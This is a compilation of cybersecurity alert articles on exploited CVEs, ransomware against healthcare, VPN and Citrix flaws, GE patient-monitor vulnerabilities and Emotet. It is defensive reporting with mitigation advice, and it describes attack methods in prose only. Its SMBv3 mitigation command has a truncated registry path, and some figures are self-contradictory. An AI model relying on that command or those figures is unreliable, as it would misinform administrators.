Category: Cybersecurity Alerts

The FBI and the Cybersecurity and Infrastructure Security Agency recently published a joint public service announcement describing the top ten most exploited vulnerabilities from 2016 to 2019. Sophisticated nation-state hackers are exploiting these vulnerabilities to attack companies both in the public and private industries to access their systems to steal sensitive information.

Hacking groups connected to China, Russia, Iran, and North Korea widely exploit the vulnerabilities in the list. Their cyber actors still perform attacks taking advantage of the vulnerabilities, although patches were already available to correct the vulnerabilities. In certain instances, patches were available for over 5 years, but a number of companies have yet to apply the patches.

If attackers exploit the vulnerabilities included in the top 10 list, fewer resources are required as compared to zero-day exploits. That means they could conduct more attacks. If companies apply the patches to resolve the top 10 vulnerabilities, it will force nation-state hackers to create new exploits that will restrict their ability to perform attacks.

CISA and FBI explain in the announcement that a determined campaign to patch the vulnerabilities would bring in friction into foreign adversaries’ operational tradecraft and compel them to create or obtain exploits that are more expensive and less extensively effective. A determined patching campaign will additionally strengthen network security by concentrating hard to find defensive solutions on the detected activities of foreign adversaries.

CISA and the FBI expect the list will direct companies to prioritize patching and urge all companies to spend more time and means into patching and create a program that will update all system patching moving forward.

Top 10 Consistently Exploited Vulnerabilities

The consistently exploited vulnerabilities in the top ten list include vulnerabilities in Adobe Flash Player, Microsoft SharePoint, Microsoft Windows, Microsoft Office, Microsoft .NET Framework, Apache Struts, and Drupal. From the ten listed vulnerabilities, the majority of nation-state hacking groups have focused on only three vulnerabilities that concern Microsoft’s OLE technology – CVE-2017-11882, CVE-2012-0158 and CVE-2017-0199. Microsoft’s Object Linking and Embedding (OLE) enables the embedding of content from other applications in Word Documents. The number 4 most frequently exploited vulnerability is CVE-2017-5638, which is found in the Apache Struts web framework. These vulnerabilities were exploited to set up a variety of different malware payloads such as Loki, Pony/FAREIT, FormBook, FINSPY, LATENTBOT, JexBos, Dridex, China Chopper, DOGCALL, FinFisher, WingBird, and Kitty.

1. Vulnerability CVE-2017-11882 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products
2. Vulnerability CVE-2017-0199 affects Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1
3. Vulnerability CVE-2017-5638 affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1
4. Vulnerability CVE-2012-0158 affects Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; BizTalk Server 2002 SP1; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; Visual Basic 6.0; and Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2;
5. Vulnerability CVE-2019-0604 affects Microsoft SharePoint
6. Vulnerability CVE-2017-0143 affects Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT
7. Vulnerability CVE-2018-4878 affects Adobe Flash Player before 28.0.0.161
8. Vulnerability CVE-2017-8759 affects Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7
9. Vulnerability CVE-2015-1641 affects Microsoft Word 2007 SP3, Office 2010 SP2, Word 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word for Mac 2011, Office Compatibility Pack SP3, Word Automation Services on SharePoint Server 2010 SP2 and 2013 SP1, and Office Web Apps Server 2010 SP2 and 2013 SP1
10. Vulnerability CVE-2018-7600 affects Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1

    A warning was also issued regarding two vulnerabilities – Citrix vulnerability CVE-2019-19781 and Pulse Secure VPN vulnerability CVE-2019-11510 – which were exploited in the 2020 attacks. Nation-state hackers and cybercriminal groups exploit these vulnerabilities that both involve Virtual Private Network (VPN) solutions.

The haste to use cloud collaboration services like Microsoft Office 365 to enable employees to do remote work because of COVID-19 has provided hackers new alternatives to attacking companies. Rash deployments of these options have resulted in oversights in security settings that made them susceptible to attack. Cybersecurity weaknesses are likewise being exploited, including poor employee training with regards to phishing and social engineering. Insufficiency of system recovery and backup plans has additionally put companies in danger of ransomware attacks.

There was an increase in human-operated ransomware attacks on healthcare providers and critical infrastructure during the COVID-19 crisis. Many attacks have happened on healthcare providers in the last weeks, which include Parkview Medical Center, Brandywine Counselling and Community Services and ExecuPharm.

A lot of ransomware attacks are programmed and begin with a phishing email. As soon as ransomware is installed, it usually starts encryption within one hour. Human-operated ransomware attacks are not so. Access is acquired to systems a few weeks or months prior to the deployment of ransomware. At that time, the attackers get credentials, go laterally, and gather and exfiltrate information before the ransomware encrypts files.

The attackers could stay dormant in systems for a few months before deploying the ransomware to make the most disruption. The COVID-19 crisis is the best time to deploy ransomware on healthcare providers and other institutions engaged in responding to COVID-19, since there is a greater likelihood that the ransom is going to be paid to make sure a fast recovery.

According to Microsoft’s data, in April’s first two weeks, many attacks were performed by a variety of advanced cybercriminal groups on healthcare organizations, research and pharmaceutical companies, medical billing firms, and dealers to the healthcare sector, alongside attacks on educational software companies, producers, government organizations, and aid organizations.

It was observed that human-operated ransomware attacks use the following 10 ransomware variants: Maze, RobbinHood, PonyFinal, Valet Loader, REvil (Sodinokibi), NetWalker, RagnarLocker, Paradise, LockBit and MedusaLocker. Though using different ransomware variants, the attacks typically happen in a similar manner. First, the attackers access the systems; Second, they steal credentials, proceed laterally, exfiltrate sensitive information, build persistence, prior to deploying the ransomware payload.

Microsoft has provided information about the way attackers access systems to help network defenders strengthen their defenses and prohibit attacks. Even though there are a few possible ways of assaulting an organization, the threat actors normally use similar methods to acquire access.

One of the often used methods of attack is via Remote Desktop Protocol or Virtual Desktop endpoints which lack multi-factor authentication, frequently using stolen credentials or via brute force strategies to guess weak passwords. With no multi-factor authentication, the attackers can use stolen credentials to access systems. Because valid credentials are employed, network defenders are not able to know the attackers accessing their networks.

Flaws in internet-facing systems are often exploited. Examples are misconfigured web servers, backup servers, EHRs, and systems management servers. Unpatched vulnerabilities are likewise frequently exploited. Some of the April 2020 attacks involved taking advantage of the Pulse Secure VPN flaw, CVE-2019-11510 and the Citrix Application Delivery Controller (ADC) vulnerability, CVE-2019-19781. Flaws in unsupported operating systems are additionally exploited. To prevent attacks, it is important to update operating systems and apply patches immediately after release.

These attacks do not deploy ransomware quickly to get a fast payout. All of the threat actors take their time to get administrative credentials and go laterally with the purpose of penetrating an organization’s entire system, including inboxes, EHRs, endpoints, and applications. Most of the attacks entailed data exfiltration with the intention to sell data for profit or to use it for nefarious purposes, or to compel organizations to pay the ransom.

The time frame from the preliminary compromise to the deployment of ransomware offers network defenders a chance to detect and prevent the attacks. Though threat actors attempt to cover their activity, it is likely to determine their activities when they move laterally. There should be network defenders that check activities that may signify an ongoing attack and other penetration-testing programs. Security logs must be inspected to find signs of tampering. Registry alterations and suspicious access to the Local Security Authority Subsystem Service (LSASS) should also be identified.

Microsoft also provides comprehensive advice on fortifying security to stop attacks and the guidelines for investigation, the seclusion of compromised endpoints, and restoration in case an attack is discovered.

A new RiskIQ report stated that ransomware groups are focusing their campaigns on smaller healthcare companies and clinics. Healthcare companies having less than 500 workers account for 70% of all reported healthcare ransomware attacks that succeeded since 2016.

RiskIQ’s studied 127 healthcare ransomware attacks and revealed that attacks from 2016 to 2019 increased by 35%. 51% of ransomware attacks were on hospitals and healthcare centers, 24% were on medical practices, and 17% were on health and wellness facilities.

Smaller healthcare providers most likely have less effective cybersecurity defenses than larger healthcare providers. RiskIQ states that 85% of SME hospitals lack a qualified IT security officer, thus gaps in security are not addressed. Paying the ransom is the more likely action in order to stay clear of the expensive downtime due to an attack. If the ransom is not paid, recovery often takes several weeks.

A Perfect Storm of New Targets and Methods

According to the RiskIQ intelligence brief “Ransomware in the Health Sector 2020,” there’s “a perfect storm of new targets and methods” because of the digital trend in healthcare. However, recent incidents exposed the healthcare sector to a lot more attacks. The 2019 Novel Coronavirus outbreak has spurred healthcare companies to come up with big changes. Almost instantaneously, there was decentralization of workforces and business operations. Hence, the protection gaps widened and visibility into attack surfaces decreased.

A number of ransomware groups have stated their intention not to attack healthcare providers throughout the COVID-19 public health emergency. However, a few groups would not do the same. It is easier to attack nowadays and they’re taking advantage of the situation. Cybercriminals are taking advantage of coronavirus problems, therefore, there’s a surge in malicious online activities that will likely affect healthcare amenities and COVID-19 responders.

Ransom Payment is Not a Guarantee of File Recovery

16% of healthcare ransomware attack victims claimed they paid ransom money to obtain the file decryption keys. The average ransom payment associated with those attacks was $59,000. Although paying the ransom is a solution, the FBI does not recommend it because it only promotes more attacks and the recovery of files is not 100%. In fact, a Wall Street Journal article mentioned that less than 50% of the decryption keys are not working, therefore some data loss is unavoidable even after paying the ransom. There were also instances that the attackers required another payment after paying the initial before providing the decryption keys. Paying a ransom additionally communicates a message to ransomware gangs that this target is very likely to pay if attacked, and so the healthcare provider might be targeted again by the attacker or others.

Ransomware gangs utilize a number of ways to access healthcare networks to install ransomware. One way is to use spam email to fool the healthcare employee into clicking malicious url links that download ransomware or opening email attachments that contain ransomware downloaders. Software vulnerabilities, particularly in Remote Desktop Protocol, are often exploited. Because a great number of employees are now using healthcare networks remotely through Virtual Private Networks (VPNs), ransomware gangs are also targeting VPN vulnerabilities. A number of vulnerabilities were identified in VPN facilities during the past year. Though patches are available to resolve flaws, they are usually not employed.

Action Steps to Minimize Risk and Stop Ransomware Attacks

Be sure to make backups regularly so that files can be recovered when an attack occurs. However, the backups do not guarantee data restoration. A number of threat gangs are performing manual ransomware attacks and use up a lot of time in network access prior to deploying ransomware. In addition, sometimes the attackers insert their ransomware even into backup systems to encrypt backups also.

RiskIQ recommends healthcare providers to store the created backups offline, or on other networks. Encryption of saved data is likewise essential. There was a growth in information stealing before ransomware deployment. When information is coded, even though it is stolen the attackers cannot access the information.

RiskIQ highlights the value of having an incident response strategy, because this is going to help make sure attacks are mitigated immediately to lessen damages. It is also very important to apply patches quickly.

During the COVID-19 crisis, make sure that all digital assets connecting to an external organization are monitored and secured, because attackers are looking for these gadgets.

It is furthermore crucial to get the workforce ready and train the employees to recognize threats like phishing attacks. Phishing simulation exercises could help to cut down susceptibility to ransomware attacks. IT groups must also be updated on the most recent attack trends that constantly change.

The COVID-19 outbreak has made it necessary for a lot of people to self-quarantine. Organizations are under growing pressure to allow their workers to work at home when possible. Although these steps are required to keep individuals safe and prevent infection, having a lot of workers working remotely heightens cyber risk. Whenever people work at home and link to work networks remotely utilizing portable electronic gadgets, the attack surface increases substantially and new vulnerabilities are brought in that attackers could exploit. With attacks aimed towards remote workers growing, it is essential to make sure that cybersecurity guidelines for securing remote workers are followed to decrease risk.

Phishing Campaigns Aimed towards Remote Employees

Cybercriminals are currently taking advantage of the coronavirus crisis and are utilizing COVID-19 and coronavirus-inspired baits in phishing and social engineering attacks so as to steal account credentials and spread malware. The first primary coronavirus-inspired phishing and malware spread campaigns were discovered at the start of January and the amount of malicious emails has increased considerably in the subsequent weeks. Phishing attacks will most likely increase as cybercriminals attempt to steal remote access credentials and employ it for weaponized email attacks that propagate malware.

Campaigns aimed towards remote employees have additionally lately been discovered. One such campaign notifies remote personnel to positive COVID-19 tests withinside their company. The messages imitate their employer and claim to have information about emergency procedures that were enforced, which remote employees are advised to open, look over and print out. Upon opening the attachments and allowing content will prompt a malware download. Security experts have additionally discovered a rise in domains being utilized for driving malware attacks.

VPN Vulnerabilities Exploitation

In the past year, a number of critical vulnerabilities were discovered in the Virtual Private Network (VPN) solutions which are utilized by remote employees for secure connection to their company networks. Pulse Connect Secure and Pulse Policy Secure gateways and FortiGuard and FortiGuard solutions were found to have vulnerabilities. Although patches were issued to fix the vulnerabilities, a lot of organizations did not use the patches because the solutions were being used 24 hours a day. APT groups grabbed the opportunity and exploited the vulnerabilities to access the networks of companies. Today, with a lot of employees utilizing VPNs and working from their homes, attacks are growing once more.

A large number of businesses are currently utilizing VPN services, teleconferencing options, and other remote access methods for the first time, and have needed to use the solutions quickly. Web and email services which were just accessed within the company have now been reconfigured to make sure it permits external access. Initially, those internal services were open to the internet. The rate at which the adjustments were made to allow access for telecommuting workers suggests that businesses were unable to examine completely and make sure that security is buttoned down.

To avert the spread of the coronavirus, a lot of companies are enabling their employees to do work from home. Although this measure is essential for lowering the risk of being infected with Coronavirus Disease 2019 (COVID-19), working from home brings other problems.

So as to defend against cyberattacks, remote network connection must be used with enterprise-class virtual private networks (VPN) solutions. VPNs protect the connection between the device of a user and the network, permitting the accessing and sharing of healthcare data securely.

Although VPNs will enhance security, a lot of VPN solutions have vulnerabilities that cybercriminals could exploit. In case of exploitation of those vulnerabilities, sensitive information may be intercepted, and an attacker can even assume control of impacted systems. Cybercriminals are looking for vulnerabilities in VPNs to take advantage of, and having more remote employees due to the coronavirus offers them even more victims to attack.

The dangers connected with VPNs and the growing number of remote employees due to the coronavirus has made the Department of Homeland Security’s Cybersecurity Infrastructure and Security Agency (CISA) to give an advisory to companies to boost VPN security and follow cybersecurity controls to defend against cyberattacks.

A number of vulnerabilities were found in common VPN solutions in the past year, which include VPN applications from Palo Alto Networks, Pulse Secure, and FortiGuard. Although there were patches available to deal with the vulnerabilities, a lot of companies didn’t update their software program to the most recent version. The inability to patch does away with the security provided by the VPN.

In January 2020, there’s a campaign detected aimed towards the CVE-2019-11510 vulnerability or remote code execution vulnerability in Pulse Secure Connect and Pulse Policy Secure to deploy REvil ransomware. By taking advantage of the vulnerability, an attacker can possibly access all active users and get their credentials in plaintext and implement arbitrary commands on VPN clients if they hook up to the server. Pulse Secure released a patch to fix the vulnerability on April 24, 2019, however, 9 months afterward, a lot of businesses continue to use vulnerable VPN versions.

Updating VPNs may be hard since they are generally in use 24 hours a day; nevertheless, it is important that updates are employed because of the high possibility that unpatched vulnerabilities can be exploited. CISA is encouraging all businesses to make certain to prioritize VPN patches.

It is additionally essential to be sure that users just could access to systems which are crucial to carrying out their job tasks. Making sure remote workers are given low-level privileges will lessen the problems that could be created in case their credentials are exposed. IT teams have to likewise intensify tracking of their systems and examining access records to determine possible compromises.

CISA has additionally cautioned about the growing incidents of phishing attacks aimed towards remote workers to acquire VPN credentials. Setting up email security solutions are necessary to catch these communications before they’re sent. Multifactor authentication ought to be integrated for remote access to avoid the use of compromised credentials. CISA alerts that businesses that do not implement MFA are going to be at a higher risk from phishing attacks.

IT teams likewise must ensure their systems can handle the higher number of remote personnel. CISA warns that businesses may discover they just have a few VPN connections and if they are all being used certain users won’t be able to access the systems to do telework.

The HHS’ Centers for Medicare and Medicaid Services (CMS) has extended Medicare telehealth benefits to assist in the struggle against the COVID-19 and the HHS’ Office for Civil Rights has declared it is going to use implementation prudence with regards to telehealth. This is going to enable more healthcare employees to work remotely throughout the upcoming weeks. It is consequently necessary that VPN guidelines are adopted.

A critical vulnerability was found in Windows Server Message Block version 3 (SMBv3) that an attacker could potentially exploit using a WannaCry-style attack. The vulnerability can be combined with a worm so that one infected machine could infect all other vulnerable devices connected to the network.

This vulnerability in the SMBv3 communication protocol entails a pre-auth remote code execution because of an error that happens when SMBv3 deals with maliciously created compressed data packets. When exploited, an unauthenticated attacker can execute arbitrary code within the framework of the application and completely control a vulnerable system. The attacker can exploit the vulnerability remotely by sending an exclusively created packet to a particular SMBv3 server.

The vulnerability monitored as CVE-2020-0796, impacts Windows Server Version 1903 (Server Core installation), Windows 10 Version 1903, Windows Server Version 1909 (Server Core installation) and Windows 10 Version 1909. There’s no confirmation yet regarding the vulnerability of earlier Windows versions like Windows 8 and Windows Server 2012.

Fortinet and Cisco Talos posted on their blogs a summary of the SMBV3 vulnerability, though Cisco Talos removed the post later. Microsoft was expected to release a patch for the vulnerability on March 2020 Patch Tuesday, however, a total fix wasn’t ready yet.

There is no published proof of concept exploits for the vulnerability online yet and there was no report of vulnerability exploitation cases in the wild; nonetheless, Microsoft advises Windows administrators to take action to safeguard against exploitation until the release of a patch to fix the vulnerability.

Temporary Solutions:

• Deactivate SMBv3 compression
• Blocking of TCP port 445 on the network perimeter firewall
• Obstruction of port 445 is the recommended defense versus web-based attacks, however it won’t stop exploitation from inside the enterprise firewall.

SMBv3 compression could be deactivated on SMBv3 servers by utilizing the PowerShell command: Set-ItemProperty -Path “HKLM:” DisableCompression -Type DWORD -Value 1 -Force. It is not required to reboot after making changes.

According to Microsoft, deactivating SMBv3 compression won’t stop the exploitation of SMB clients.

Applying the patch immediately after its release is necessary. There is no schedule yet concerning the release of the patch. Because of the severity of the vulnerability, it is likely that there will be an out-of-band patch released.

A security researcher at CyberMDX identified critical vulnerabilities in GE Healthcare patient monitoring equipment.

CyberMDX Head of Research, Elad Luz, discovered six vulnerabilities, with five rated as critical and one rated as high severity. The assigned CVSS v3 score of the five critical vulnerabilities was 10 out of 10. The assigned CVSS v3 score for the other vulnerability was 8.5 out of 10.

Attackers exploiting the vulnerabilities could make the affected products useless. The functionality of vulnerable products could be modified remotely. The alarm settings could be disabled and stored protected health information (PHI) in the device could be stolen.

The first product investigated by CyberMDX was the CARESCAPE Clinical Information Center (CIC) Pro product, however, it was found out that the vulnerabilities affected patient monitors, telemetry systems and servers. The vulnerabilities were altogether called MDHex and were labeled as CVE-2020-6961, CVE-2020-6962, CVE-2020-6963, CVE-2020-6964, CVE-2020-6965, and CVE-2020-6966. GE Healthcare confirmed the potentially serious consequences of the vulnerabilities to patients when hundreds of thousands of products are exploited.

CVE-2020-6961 (CVSS 10.0) – this vulnerability allows exploitation of the unsecured storage of credentials (CWE-256). An attacker exploiting the vulnerability could get the SSH private key from the configuration files through an SSH connection and wirelessly execute arbitrary code on affected products. All vulnerable products share the same SSH key.

CVE-2020-6962 (CVSS 10.0) – this vulnerability exploits the input validation vulnerability (CWE-20) found in the configuration utility of the networked system. It allows an attacker to execute arbitrary code remotely.

CVE-2020-6963 (CVSS 10.0) – this vulnerability is concerned with the usage of hard-coded Server Message Block (SMB) credentials (CWE-798). It allows an attacker to set up an SMB link and read and/or write files within the system. The SMB credentials can be acquired by means of the password recovery tool of the Windows XP Embedded operating system.

CVE-2020-6964 (CVSS 10.0) – this vulnerability exploits the insufficient authentication for critical function (CWE-306) of the incorporated Kavoom! Keyboard/mouse software program. If an attacker exploits this vulnerability, remotely inputting keystrokes and changing device configurations on all affected devices on the network are possible even with no authentication.

CVE-2020- 6965 (CVSS 8.5) – this vulnerability is because of the inability to limit the upload of unsafe file types (CWE-434). It allows an attacker to upload arbitrary files via the software update facility.

CVE-2020-6966 (CVSS 10.0) – this vulnerability exploits weak encryption (CWE-326). With weak encryption, an attacker acquires remote desktop control via the VNC software to remotely execute code on vulnerable connected devices. The required credentials can likewise be acquired from product documentation available to the public.

Based on the latest ICS-CERT Advisory, the vulnerabilities affect the following GE Healthcare products:

• ApexPro Telemetry Server, Versions 4.2 and earlier versions
• Clinical Information Center (CIC), Versions 4.X and 5.X
• CARESCAPE Telemetry Server, Versions 4.2 and earlier versions
• CARESCAPE Central Station (CSCS), Versions 1.X; Versions 2.X
• CARESCAPE Telemetry Server, Version 4.3
• B450, Version 2.X
• B650, Version 1.X; Version 2.X
• B850, Version 1.X; Version 2.X

GE Healthcare is presently creating patches to fix vulnerable devices. The patches will be available in Q2 of 2020. Meanwhile, GE Healthcare has released recommended mitigations to minimize the threat of vulnerabilities exploitation.

Healthcare providers must carry out basic network security guidelines and make sure to configure the mission critical (MC) and information exchange (IX) networks correctly and satisfy the conditions established in the CARESCAPE Network Configuration Guide, Patient Monitoring Network Configuration Guide, and product technical and service manuals.

Use a router or firewall if connectivity outside the MC and/or IX networks is necessary. GE Healthcare advises blocking all inbound traffic from beyond the network at the MC and IX router firewall, except if needed for clinical data flows. The listed ports must be blocked so that traffic from outside the MC and IX network don’t get through:

• TCP Port 22 for SSH and TCP
• UDP Ports 137, 138, 139, and 445 for NetBIOS and SMB
• TCP Ports 10000, 5225, 5800, 5900, and 10001

Limit physical access to Telemetry Servers, Central Stations, and the MC and IX networks. Follow password management guidelines and change default passwords for Webmin.

It is believed that no exploits for the vulnerabilities were made public. GE Healthcare is not aware of any attempts of cyberattacks or patient injury resulting from the vulnerabilities.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a warning about the increase of Emotet malware attacks recently.

The first detection of Emotet was in 2014 and it was used for stealing banking credentials at first. But it has developed considerably over the past five years and is currently a very sophisticated Trojan.

Besides stealing banking information, Emotet can steal passwords stored in web browsers and the credentials files of external drives. Modules were included that enable it to propagate via email and download other malware variants. The malware was employed for infecting devices with crypto wallet stealers and cryptocurrency miners, the TrickBot banking Trojan, and Ryuk ransomware These other payloads are usually downloaded weeks, months, or even years after the initial Emotet infection.

Emotet malware is mainly delivered by using spam email. At first, the malware was distributed by JavaScript attachments; but, the threat actors behind the malware switched to Office documents containing malicious macros that utilize PowerShell commands to download the malware. When the email attachment is opened and content is enabled, the download and execution of Emotet will begin quietly. Spam emails that contain hyperlinks to malicious sites were also used to install the malware.

Emotet malware persistently inserts itself into running processes and creates registry entries to make sure it is run every time the computer boots. Following the infection of a victim’s computer, it is included in the Emotet botnet. The computer will then be employed to send out copies of Emotet to the contacts of the victim via email. As per SecureWorks, Emotet takes the first 8KB of all emails in the inbox and use it to create new messages to contacts containing real message threads and replies land in the unread messages in the inbox. This strategy increases the likelihood that the recipient would open the message and file attachment. Campaigns were also detected using email attachments that copy receipts, shipping notices, invoices, and remittance notices.

Besides propagation through email, Emotet enumerates network resources and writes itself to networked drives. It likewise brute forces domain credentials. In case Emotet is found on one computer, it is probable that many others are equally infected. Removing Emotet could be serious as cleaned devices could be reinfected by other infected computers on the network.

Since May 2019, the Emotet botnet was not active but it reactivated in September. Emotet activity all of the sudden stopped once more in late December and stayed quiet until January 13, 2020 when substantial spamming campaigns began again. Proofpoint discovered one spam campaign targeting pharma firms that had 750,000 emails sent in a day.

An attacker could successfully use an Emotet infection to acquire sensitive information. Such an attack can cause proprietary information and financial trouble along with disruption to operations and ruin reputation.

CISA recommends taking the following action steps to minimize the danger of an Emotet malware attack:

• Stop email attachments that are frequently linked to malware (.exe, .dll, .js etc)
• Block email attachments e.g. .zip, .rar files because they could not be scanned by anti-virus software
• Apply Group Policy Object and firewall policies.
• Make sure to install anti-virus software on all endpoints
• Make sure to apply patches promptly and adopt a formalized patch management process
• Apply filters at the email gateway
• Use firewall to obstruct suspicious IP addresses
• Minimize the use of admin credentials and follow the principle of least privilege
• Use DMARC
• Segment and isolate networks
• Restrict unneeded lateral communications

Complete CISA guidance on stopping Emotet and protecting against attacks is available on this link.

Adventist Health Sonora in California encountered unauthorized access by an individual to a hospital associate’s email account resulting in the potential exposure of patient information.

The information security team of Adventist Health Sonora detected the email account breach on September 30, 2019. Quick action was undertaken to keep the compromised Office 365 account secure. Adventist Health Sonora had the breach investigated to know its extent.

The investigation confirmed that there was unauthorized access to the Office 365 account after employees responded to a phishing email. However, it was an isolated incident. Other email accounts or systems were not affected.

The reason for the attack seems to be the redirection of invoice payments and robbing of the hospital and its vendors, and not to obtain sensitive patient information.

As per Adventist Health Sonora, the thorough review of the breached account on October 14, 2019 showed that the account contained 2,653 patients’ protected health information (PHI). The types of information exposed included names, medical record numbers, dates of birth, health insurance information, hospital account numbers, and medical details associated to the treatment made available at the hospital.

There is no evidence uncovered that suggests the attacker obtained patient information. But to ensure the safety of the affected patients, Adventist Health Sonora sent notification letters and gave complimentary identity theft protection services for one year.

80% Recovery After Great Plains Health November 2019 Ransomware Attack

Great Plains Health located in North Platte, NE encountered a ransomware attack in November 2019 that resulted in its network encryption. The provider decided not to pay the ransom and restored the systems from backups. It was a long and painstaking process, but hospital representatives announced that it’s already 80% complete.

Patient system restoration was given utmost importance and was restored first. Critical patient systems were restored in two weeks. The staff worked 24/7 to ensure the restoration of the systems as soon as possible. After the attack and during the system recovery process, patients continued to get medical services and they were not turned away or redirected to other healthcare facilities.

Hospital representatives have now reported that all key IT systems are already back online. The ransomware attack did not affect any of the patient care services. Only the archives need restoration, which includes information that the hospital rarely uses.

The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) gave an alert regarding a recently identified vulnerability in the Citrix Gateway web server appliances and the Citrix Application Delivery Controller.

An attacker can exploit the vulnerability (labeled as CVE-2019-19781) via the internet and execute arbitrary code on vulnerable appliances remotely. By exploiting the vulnerability, it is possible to access the appliances and use it to attack other resources linked to the internal network. A number of security researchers consider the bug as one of the most threatening discovery recently.

The advisory, given on January 8, 2020, prompts all establishments using the vulnerable Citrix appliances (formerly NetScaler ADC and NetScaler Gateway) to implement mitigations without delay to restrict the possibility of an attack, and to employ the firmware updates the moment they are available this month.

Two proof of concept exploits were published on GitHub which makes exploiting vulnerabilities trivial. There have been more scans for vulnerable systems since Project Zero India and TrustedSec published the exploits on Friday. Attacks on honeypots built by security researchers have become more frequent on weekends.

Around the world, there are roughly 80,000 companies in 158 countries that must implement mitigations to resolve the vulnerabilities. Around 38% of vulnerable institutions are found in the U.S.A.

The vulnerabilities are found in versions 13.0, 12.1, 12.0, 11.1, and 10.5 of the Citrix Application Delivery Controller and Citrix Gateway web server, including NetScaler Gateway and Citrix NetScaler ADC.

UK security researcher Mikhail Klyuchnikov discovered the path traversal bug and notified Citrix about it. A vulnerable appliance can be exploited via the internet without requiring authentication. All that is needed to exploit the vulnerability is to locate a vulnerable appliance and transmit a specially crafted request together with the exploit code. Security researchers on cybersecurity forums refer to the bug as Shitrix.

At this time, a patch to correct the flaw is not yet available. Citrix is going to issue a firmware upgrade at the end of the month to fix the vulnerability. The scheduled release is as follows:

• January 20, 2020 for firmware versions 11.1 and 12.0
• January 27, 2020 for versions 12.1 and 13.0
• January 31, 2020 for version 10.5

Meanwhile, it is important to apply configuration changes to make vulnerability exploitation more difficult. These are available on the Citrix Support Page CTX267679.

Because the vulnerability is presently being actively attacked, after implementing mitigations be sure to check that the flaw is not yet exploited.

TrustedSec, which stopped publishing its PoC exploit code until the release of an exploit on GitHub, has created a tool for identifying vulnerable Citrix incidents on systems and has shared possible clues of compromised Citrix hosts.

The U.S. Department of Homeland Security released a warning regarding retaliatory cyberattacks after the military action in Iraq killed Iran’s leading general, Major General Qasem Soleimani.

The U.S. Department of Defense issued a statement that General Soleimani was definitely setting up plans to attack American diplomats and service members located in Iraq and all over the region. President Trump mentioned in a tweet after the attack that America’s action the night before was intended to prevent a war and that it was not to begin a warfare.

Iran condemned the attack and its top leader, Ayatollah Ali Khamenei, said they will make a “forceful revenge” on America. The U.S. State Department has instructed all Americans staying in Iraq to get out of the country for their safety. On Sunday, Iraqi MPs decided to get rid of all US troops from the land.

There are fears that Iran will have reprisal attacks, which will happen in cyberspace instead of on the ground. US corporations, government institutions, and critical infrastructure may be targeted. Iran might have rather limited military power, nonetheless Iran’s highly capable of doing detrimental cyberattacks.

Threat actors with an association to the Iranian government have long been executing cyberattacks in the U.S., nonetheless, the nature of the attacks could well differ. Iran has been making an array of offensive cyber instruments and has performed detrimental cyberattacks in past times. Remarkably, threat actors connected to Iran employed the wiper malware Shamoon to infiltrate the Saudi Arabian oil giant Aramco in 2012. It is believed that they have developed other wiper malware variants that could be deployed against targets in America. Iran was likewise linked to the SamSam ransomware attacks, such as the incident on the City of Atlanta.

The DHS acting secretary, Chad Wolf, stated that no specific, credible threats against America have been recognized to date. The DHS will remain to keep track of the issue and will be working together with local, state, and federal partners to be sure of the security of all people in America.

It’s not known if or when to expect attacks, however local, state, and federal heads have been told to take on the needed safety measures. Director of the DHS’ Cybersecurity and Infrastructure Security Agency, Chris Krebs, stated that it is time to know about Iranian [Tactics, Techniques, and Procedures] and pay close attention to your systems, specifically ICS. Be sure to watch third party accesses as well.

Krebs additionally referenced a previous warning that he issued in June that CISA knows a recent increase in malicious cyber activities focused on United States companies and government organizations by Iranian regime actors and proxies. The intelligence community and cybersecurity partners are keeping track of Iranian cyber activity, sharing information, and taking steps to maintain the safety of America and its allies.

The FBI announced a TLP:Amber alert because of the outbreak of cyberattacks using the ransomware MegaCortex and LockerGaga variants. The threat actors use these ransomware variants to target big enterprises and businesses and normally deploy the ransomware a few months after the compromise of a network.

The first detected attack using LockerGaga was in January 2019. The MegaCortex ransomware, on the other hand, first showed up in May 2019. The two ransomware variants present the same IoCs and have the same C2 infrastructure. Both are employed in attacks targeting large business networks.

Known ransomware attacks using LockerGaga include the attacks on the American chemical firms Hexion and Momentive, Norsk Hydro (an aluminum and energy firm), and the Altran Technologies engineering consulting company. Ransomware attacks using MegaCortex include those on the Wolters Kluwer accounting software company and the iNSYNQ cloud hosting company. The threat actors are cautious, systematic, and try to bring about maximum damage so that victims will be more likely to pay the ransom demand, that often amounts to hundreds of thousands of dollars.

According to the FBI warning, the preliminary compromise is accomplished by means of different methods such as phishing attacks, exploiting unpatched vulnerabilities, SQL injection, brute force techniques on RDP, and using stolen credentials. After the compromise, the attackers run batch files to halt processes and services employed by security solutions to hide their presence. The attackers work sideways to compromise the most number of devices using a penetration testing device known as Cobalt Strike, living-of-the-land Windows binaries, and legit software applications like Mimikatz. The attacker adds a beacon to every compromised device on the system, which is employed to carry out PowerShell scripts, elevate privileges, and spawn a new session to operate as a listener on the victim’s network.

Contrary to a lot of other threat actors who use ransomware shortly after the compromise of a system, the threat actors responsible for these attacks frequently wait a couple of months before triggering the ransomware encryption routine. It is not known what exactly the threat actors do at that time, however it is probable the time is utilized for stealing sensitive information. The ransomware is used in the last stage of the attack as soon as the attackers got all the valuable information of the victims.

The FBI offered standard advice to boost defenses for stopping ransomware and other cyberattacks. The following cybersecurity best practices must be implemented:

• back up data on a regular basis
• store copies of backup data on non-networked devices
• test backups to confirm file recovery
• set strong passwords
• patch promptly
• enable multi-factor authentication, particularly on admin accounts
• make sure RDP servers could be accessed through a VPN only
• deactivate SMBv1
• scan for open ports and block them to make them inaccessible

